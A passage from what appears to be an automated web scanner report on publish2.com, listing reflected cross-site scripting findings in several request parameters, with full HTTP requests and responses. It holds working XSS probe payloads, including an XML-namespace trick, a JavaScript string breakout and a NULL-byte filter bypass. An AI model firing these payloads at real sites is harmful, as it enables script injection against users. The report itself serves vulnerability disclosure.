HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:38 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/ Set-Cookie: kohanasession=uspk6o0t8gpbs235fd6qp5bav6; path=/ Set-Cookie: kohanasession=uspk6o0t8gpbs235fd6qp5bav6; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJ1c3BrNm8wdDhncGJzMjM1ZmQ2cXA1YmF2NiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5ODs%3D; path=/ Content-Length: 1346 Connection: close Content-Type: application/rss+xml; charset=utf-8
The value of the number_of_items request parameter is copied into the XML document as plain text between tags. The payload 99f44<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ca96b448bbd was submitted in the number_of_items parameter. This input was echoed as 99f44<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ca96b448bbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=599f44<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ca96b448bbd&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:38 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/ Set-Cookie: kohanasession=3vdfeb65j81nbk6qkhjljv8uu1; path=/ Set-Cookie: kohanasession=3vdfeb65j81nbk6qkhjljv8uu1; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIzdmRmZWI2NWo4MW5iazZxa2hqbGp2OHV1MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5ODs%3D; path=/ Content-Length: 1346 Connection: close Content-Type: application/rss+xml; charset=utf-8
The value of the tag request parameter is copied into the XML document as plain text between tags. The payload 5df20<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6be915f83ed was submitted in the tag parameter. This input was echoed as 5df20<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6be915f83ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd5df20<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6be915f83ed&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:38 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/ Set-Cookie: kohanasession=1jv7guq9upt1t7gf4bh248trm5; path=/ Set-Cookie: kohanasession=1jv7guq9upt1t7gf4bh248trm5; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIxanY3Z3VxOXVwdDF0N2dmNGJoMjQ4dHJtNSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5ODs%3D; path=/ Content-Length: 1346 Connection: close Content-Type: application/rss+xml; charset=utf-8
The value of the callback request parameter is copied into the XML document as plain text between tags. The payload dc41e<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>b72313bca52 was submitted in the callback parameter. This input was echoed as dc41e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b72313bca52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /search/links.xml?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065dc41e<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>b72313bca52 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:42 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/ Set-Cookie: kohanasession=bld6kggnuehds8jp1abcvk4cm6; path=/ Set-Cookie: kohanasession=bld6kggnuehds8jp1abcvk4cm6; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJibGQ2a2dnbnVlaGRzOGpwMWFiY3ZrNGNtNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMjs%3D; path=/ Content-Length: 973 Connection: close Content-Type: application/xml; charset=UTF-8
2.384. http://www.publish2.com/search/links.xml [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.publish2.com
Path:
/search/links.xml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a8d28<a>1e70a658436 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8d28<a>1e70a658436 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /search/links.xml?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065&%00a8d28<a>1e70a658436=1 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:42 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:42 GMT; path=/ Set-Cookie: kohanasession=rirpvqacs5e0897p05tqtcc4r7; path=/ Set-Cookie: kohanasession=rirpvqacs5e0897p05tqtcc4r7; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJyaXJwdnFhY3M1ZTA4OTdwMDV0cXRjYzRyNyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMzs%3D; path=/ Content-Length: 717 Connection: close Content-Type: application/xml; charset=UTF-8
The value of the newsgroup request parameter is copied into the XML document as plain text between tags. The payload cc3b8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ab7e270bceb was submitted in the newsgroup parameter. This input was echoed as cc3b8<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ab7e270bceb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /search/links.xml?newsgroup=jeff+jarvis+linkscc3b8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ab7e270bceb&tag=wwgd&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:41 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:40 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:40 GMT; path=/ Set-Cookie: kohanasession=2fvqp0tkgaae0jiq5nutoecle4; path=/ Set-Cookie: kohanasession=2fvqp0tkgaae0jiq5nutoecle4; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIyZnZxcDB0a2dhYWUwamlxNW51dG9lY2xlNCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMTs%3D; path=/ Content-Length: 973 Connection: close Content-Type: application/xml; charset=UTF-8
The value of the number_of_items request parameter is copied into the XML document as plain text between tags. The payload 6cab1<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f51a646d8a7 was submitted in the number_of_items parameter. This input was echoed as 6cab1<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f51a646d8a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /search/links.xml?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=56cab1<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f51a646d8a7&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:42 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/ Set-Cookie: kohanasession=phe08t59sgsd7o59f09abu8lv1; path=/ Set-Cookie: kohanasession=phe08t59sgsd7o59f09abu8lv1; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJwaGUwOHQ1OXNnc2Q3bzU5ZjA5YWJ1OGx2MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMjs%3D; path=/ Content-Length: 973 Connection: close Content-Type: application/xml; charset=UTF-8
The value of the tag request parameter is copied into the XML document as plain text between tags. The payload d4dd7<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>b3bf1b2b36e was submitted in the tag parameter. This input was echoed as d4dd7<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b3bf1b2b36e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /search/links.xml?newsgroup=jeff+jarvis+links&tag=wwgdd4dd7<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>b3bf1b2b36e&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:42 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:41 GMT; path=/ Set-Cookie: kohanasession=9h87e67jvav4qlkacc2qm9q3g6; path=/ Set-Cookie: kohanasession=9h87e67jvav4qlkacc2qm9q3g6; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI5aDg3ZTY3anZhdjRxbGthY2MycW05cTNnNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwMjs%3D; path=/ Content-Length: 973 Connection: close Content-Type: application/xml; charset=UTF-8
The value of the comment_font_family request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 252ab"-alert(1)-"dd91ceb4c9b was submitted in the comment_font_family parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=252ab"-alert(1)-"dd91ceb4c9b&comment_font_size= HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:59 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: kohanasession=6i6fq02ruum5lesfhssseka761; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession=6i6fq02ruum5lesfhssseka761; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI2aTZmcTAycnV1bTVsZXNmaHNzc2VrYTc2MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MTk7; path=/ Content-Length: 3302 Content-Type: application/x-javascript
(function(){
getParentScriptTag = function() { // Attempt to get parent script tag via id scr = document.getElementById("publish2_widget_token"); // Legacy widgets don't have script ...[SNIP]... links%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=252ab"-alert(1)-"dd91ceb4c9b&comment_font_size=") { scr = scripts[i]; break; } } } };
injectContainer = function() { // Unique container for widget HTML, hidden until filled so we ...[SNIP]...
The value of the comment_font_size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7ac"-alert(1)-"9567f8361f4 was submitted in the comment_font_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=3e7ac"-alert(1)-"9567f8361f4 HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
